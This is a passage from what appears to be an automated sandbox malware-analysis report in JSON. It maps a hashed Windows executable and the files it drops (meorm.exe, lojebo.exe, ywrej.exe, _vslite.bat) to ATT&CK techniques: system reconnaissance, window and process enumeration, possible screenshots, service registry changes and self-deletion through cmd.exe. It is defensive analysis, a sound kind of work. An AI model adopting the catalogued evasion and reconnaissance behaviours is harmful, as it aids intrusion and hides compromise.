1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400f83b0000ff07000000002d00000000007f070000c4002d00302f2d007b24000094b8120067e5157700002d00082c34000000000000002d0000000000082c3400000000002724000380000000b02e3400c4002d00f05c3300003b000000002d0000000000082c3400a010000000002d0000293400f83b0000ff07000000002d00000000007f070000c4002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a0751426340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000340064c21200b344fc6905000000000000000000000000000000000000000000000000000000a40100000000000000000000000000007cc912008d92d98d20c7120020c712005ecbce75a401000000000000005dcc757cc912000e5dcc7514c51200dcaad075010000000000000072000000ffffffffffffffff9cc212007802000000000000250000009cc212007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360086b0a98df4c212006d82a0759c35340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff20009c0036000000620bce7500000000606f2d000000000050000000e43734000200000010b02f000000000001000008e0a7330088732d00380bce7528c1120002000000dcc112003f08ab760200000010b02f00000000000100001888fbaa76ccc11200c81cd075a2c3120095fbaa7600c3120010b02f0000000000000000000000000088c2120000002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007ab0a98d48c212006d82a0759c35340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360012c9a98d60bb12006d82a0756469340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b187744f43d772ccc1200cc012d0000002d0000000000000000000f007301640200000000000000000000000000001800000010006a0164020000e8dc1100cccb120090cb1200000000008e000000e0cb1200feffffff68cb1200cf001977d60019774cf43d778e00000047000000e0cb1200000000003ccb120095e11477 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d0008c13500000000003e00003e340000c030c3350060f93500980e3100f001000000002d000400000008c135008ccd12000464187738012d00e0631877a8f23d770000000000002d0010c135006dd1aa763654dc8d6cae59750000000000000000d8bec97660f93500302f2d000100000000002d0050012d000c00000010c13500302f2d000200000218000000d10c00dd820000000000000000000000030000002ccd1200820000007f070000000000006720004702000000c075b2766068340000000000c075b27648cd120040302d0000000000302f2d00a0cd1200ff2b1877 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003600484b3600434b3600000000000000000000002d0000000001c4bd12000000000028cb120095e114770c2d3700feffffff435c187750591877aa000000b8000000424b3600404b36004cbf120084c3120000000000000000000000000000000000000000000000000000000000000000001c5c177760d83075ffffffff17000000fcbe12002400000003000000ecc3120018c9120084c312008600000028bf120096ed18776a4b3600a06aee74860000004cbf120084c312000000000086008800a06aee744cbf1200916cee746a4b3600a06aee74a06aee74bcc3120002020000 (UID: 00000000-00005832)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"IsWow64Process\" with parameter \"5832\" - (UID: 00000000-00005832)\n \"meorm.exe\" called \"IsWow64Process\" with parameter \"6120\" - (UID: 00000000-00006120)\n \"cmd.exe\" called \"IsWow64Process\" with parameter \"4296\" - (UID: 00000000-00004296)\n \"lojebo.exe\" called \"IsWow64Process\" with parameter \"3636\" - (UID: 00000000-00003636)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"meorm.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"lojebo.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"ywrej.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"ywrej.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"ywrej.exe\" called \"EnumWindows\" with parameter \"1241160\" - (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005832)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005832)\n \"meorm.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006120)\n \"lojebo.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003636)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\MEORM.EXE\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\MEORM.EXE\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"meorm.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\LOJEBO.EXE\")\n \"meorm.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\LOJEBO.EXE\")\n \"lojebo.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\YWREJ.EXE\")\n \"lojebo.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\YWREJ.EXE\")\n \"lojebo.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"lojebo.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"ywrej.exe\" called \"GetWindowTextW\" (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"meorm.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"lojebo.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"FindNextFileW\" with parameter dat2336.tmp (UID: 00000000-00005832)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"ywrej.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"151062581\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"ywrej.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"973146170\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"ywrej.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"151062581\"\n \"cx\": \"0\"\n \"cy\": \"21\"}\n \"ywrej.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"973146170\"\n \"cx\": \"320\"\n \"cy\": \"30\"}\n \"ywrej.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"151062581\"\n \"cx\": \"132\"\n \"cy\": \"30\"}\n \"ywrej.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"151062581\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"ywrej.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"872482895\"\n \"cx\": \"132\"\n \"cy\": \"30\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"meorm.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lojebo.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ywrej.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.96049130412846", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" opened \"\\Device\\KsecDD\"\n \"meorm.exe\" opened \"\\Device\\KsecDD\"\n \"lojebo.exe\" opened \"\\Device\\KsecDD\"\n \"ywrej.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"meorm.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"meorm.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"meorm.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"meorm.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"lojebo.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"lojebo.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" with delete access\n \"cmd.exe\" opened \"C:\\\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"ywrej.exe\" has resource with unusual entropy \"RT_CURSOR:7.29213935247\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_CURSOR:7.30663413639\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_CURSOR:7.32770629547\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_CURSOR:7.37275273372\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_CURSOR:7.38223222897\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_CURSOR:7.35421537675\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_CURSOR:7.32888982786\"\n \"ywrej.exe\" has resource with unusual entropy 